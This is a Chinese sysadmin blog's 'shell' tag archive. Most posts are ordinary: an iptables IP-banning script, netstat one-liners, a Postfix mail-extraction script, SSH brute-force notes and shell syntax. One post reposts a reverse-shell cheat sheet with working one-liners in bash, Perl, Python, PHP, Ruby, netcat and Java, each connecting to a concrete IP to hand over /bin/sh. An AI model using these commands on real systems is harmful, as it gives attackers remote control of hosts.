cszer

标签存档: shell

banip

IN:工作相关, 技术, shell   Tags:    评论: 3   阅读:1,626 views

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/bin/bash
#2014/01/02 caishzh
 
TODAY=$(date +%Y%m%d)
LOG=/home/caishzh/banip.log
ACCESSLOG=/opt/apache/logs/access-${TODAY}.log
TMPLOG=/tmp/banip_tmp.log
NOW=$(date +%Y%m%d%H%M)
TMPTIME=$(date -d "-5 minute" +%Y%m%d%H%M)
LIMIT=30
 
sed -n "/${TMPTIME}/,/${NOW}/p" $ACCESSLOG >$TMPLOG
 
grep zone_protocol.aspx?zone_id $TMPLOG |cut -d" " -f3|sort|uniq -c|awk -v limit="$LIMIT" '$1>limit{print $1,$2}' | while read times ip;
do
     if ! iptables-save|grep $ip >/dev/null && ! grep "${ip}$" /home/caishzh/whitelist >/dev/null;then
          iptables -I INPUT -s "$ip" -p tcp -m tcp --dport 80 -j DROP    
          echo "$(date +'%F %T')  $times  $ip" >>$LOG
     fi
done
04-10
2014

反弹shell的方法汇总(转)

IN:技术, 安全   Tags:    评论: 6   阅读:1,802 views

Bash(在ubuntu12.10下测试通过)

1
bash -i >& /dev/tcp/211.152.83.2/1234 0>&1

PERL

1
perl -e 'use Socket;$i="211.152.83.2";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("211.152.83.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP(需要启用php的fsockopen函数)

1
php -r '$sock=fsockopen("211.152.83.2",1234);exec("/bin/sh -i < &3 >&3 2>&3");'

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("211.152.83.2",1234).to_i;exec sprintf("/bin/sh -i < &%d >&%d 2>&%d",f,f,f)'

Netcat

1
2
3
nc -e /bin/sh 211.152.83.2 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 211.152.83.2 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

Java

1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/211.152.83.2/1234;cat < &5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

来自:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

12-16
2013

工作中常用的shell命令

IN:工作相关, Linux 运维, shell   Tags:    评论: 1   阅读:2,591 views

列出所有 ESTABLISHED 状态的连接:

1
netstat -nta | fgrep "ESTABLISHED" | cut -b 49-75 | cut -d ':' -f1 | sort | uniq -c | sort -n -r --key=1,7 | head -25

列出所有连接状态的统计:

1
netstat -nta | fgrep ":" | cut -b 77-90 | sort | uniq -c

1
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'

继续阅读 »

06-25
2012

a shell

IN:工作相关, 技术, shell   Tags:    评论: 0   阅读:4,382 views

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/bin/bash
#caishzh create 20120425
 
ID="$1"
LOG="/var/log/maillog"
MAIL=$(mailq|grep "$ID"|awk '{print $7}')
 
[ "$MAIL" ] || exit 0
 
EML="/tmp/$MAIL.eml"
SENTLOG="/tmp/$MAIL.log"
 
postcat -q $ID >$EML || exit 0
 
grep $MAIL $LOG|grep nrcpt >$SENTLOG
 
[ -f "$EML" ] && sz $EML
[ -f "$SENTLOG" ] && sz $SENTLOG
04-25
2012

使用脚本防止ssh暴力破解

IN:技术, 安全, Linux 运维, shell   Tags: ,    评论: 3   阅读:1 views

前段时间买了个美国的vps,主要用于学习,也没太注意安全方面。今天随便看了下/var/log/secure日志:

Apr 11 11:10:05 kof sshd[18518]: Failed password for root from 1.226.82.197 port 36824 ssh2
Apr 11 11:10:10 kof sshd[18520]: Failed password for root from 1.226.82.197 port 36966 ssh2
Apr 11 11:10:15 kof sshd[18522]: Failed password for root from 1.226.82.197 port 37132 ssh2
Apr 11 11:10:19 kof sshd[18524]: Failed password for root from 1.226.82.197 port 37326 ssh2
Apr 11 11:10:24 kof sshd[18528]: Failed password for root from 1.226.82.197 port 37476 ssh2
Apr 11 11:10:29 kof sshd[18535]: Failed password for root from 1.226.82.197 port 37642 ssh2
Apr 11 11:10:34 kof sshd[18537]: Failed password for root from 1.226.82.197 port 37819 ssh2
Apr 11 11:10:39 kof sshd[18539]: Failed password for root from 1.226.82.197 port 38023 ssh2
Apr 11 11:10:44 kof sshd[18541]: Failed password for root from 1.226.82.197 port 38200 ssh2
......

大量的ssh认证失败日志 !平均5秒钟就有一次!
继续阅读 »

04-13
2012

shell语法

IN:技术, Linux 基础, shell   Tags:    评论: 2   阅读:2,080 views

1、 set命令
当没有参数的时候,列出系统中所有的自定义变量值;当有参数的时候,重置基本参数如$1、$2等。如set `date` 将date命令的输出当作输入参数;

2、let命令
执行算术运算。功能如i=j+1,shell语法为:
let “i=$j+1”,等同于 ‘expr’。 后者只能作用于整数,如 i=`expr $i+1`; 如果使用非整数,退出状态不为0 继续阅读 »

06-13
2011